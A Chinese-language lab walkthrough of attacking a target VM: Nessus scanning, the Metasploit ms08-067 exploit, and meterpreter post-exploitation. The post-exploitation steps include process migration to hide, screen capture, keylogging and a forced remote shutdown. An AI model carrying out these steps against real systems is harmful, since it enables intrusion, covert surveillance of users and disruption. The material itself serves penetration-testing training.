一、Nessus扫描漏洞
二、metasploit渗透
启动metasploit,输入命令msfconsole
使用search 命令搜索未打补丁编号,search ms08-067
使用由nessus确定的攻击程序,use
攻击程序。再查看配置的信息
设置接收主机IP和发送主机IP地址,再查看配置信息,确定
set RHOST 靶机IP
set LHOST 发起攻击主机IP
show options
开始渗透攻击,exploit
成功进入meterpreter shell,输入screenshot可捕捉靶机桌面
查看捕捉到的靶机图片,输入命令后,即可打开捕捉到的图片
查看meterpreter的id号,getpid。查看explorer.exe的ID号。
接下来需要隐藏id到explorer.exe中。migrate
1400,再查看当前meterpreter的id是否隐藏好
启动键盘记录keyscan_start,转储从靶机获取的键盘记录keyscan_dump,终止键盘记录keyscan_stop。
查看靶机正在运行的用户
进入shell,这里面做个测试在C盘根目录创建一个文件夹为test_file
在靶机系统中可以看见test_file文件夹
在20秒后关闭对方系统,并显示信息your computer has been hacked
靶机被关闭,且有消息提示